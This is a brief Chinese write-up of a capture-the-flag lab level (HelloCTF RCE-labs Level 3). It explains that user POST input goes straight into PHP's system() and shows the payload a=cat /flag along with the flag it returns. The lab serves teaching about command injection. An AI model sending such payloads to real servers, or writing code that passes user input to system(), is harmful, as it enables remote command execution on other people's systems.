HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
Rytter12 分钟前
某气骑士 libtprt.so 反 Frida 机制分析与绕过
android·安全·网络安全
天竺鼠不该去劝架1 小时前
AI+RPA 深度解析:从技术原理到行业落地,一篇读懂智能自动化核心密码
经验分享
xuhaoyu_cpp_java2 小时前
Spring学习(一)
java·经验分享·笔记·学习·spring
zhangfeng11333 小时前
PHP 语法检查命令 php -l “$file“ > /dev/null 2>&1;
开发语言·php
kybs19913 小时前
springboot视频推荐系统--附源码72953
java·spring boot·python·eclipse·asp.net·php·idea
天都3573 小时前
青少年ctf 日志排查 复盘
windows·网络安全·应急响应
计算机安禾4 小时前
【计算机网络】第6篇:虚拟局域网——基于标签的广播域划分及其安全边界
计算机网络·安全·php
X7x54 小时前
数字时代的守护者:抗DDoS设备构筑业务永续的基石
网络安全·网络攻击模型·安全威胁分析·ddos·安全架构
05候补工程师6 小时前
深度解构 ROS 2:如何手动调通 Nav2 A* 路径规划引擎
linux·人工智能·经验分享·算法·机器人
zhangfeng11336 小时前
适合 5人以内小团队的Git 工作流 + Code Review + 自动化部署方案 FastAdmin +linunx服务器宝塔系统 外包项目 —
服务器·git·自动化·php·代码复审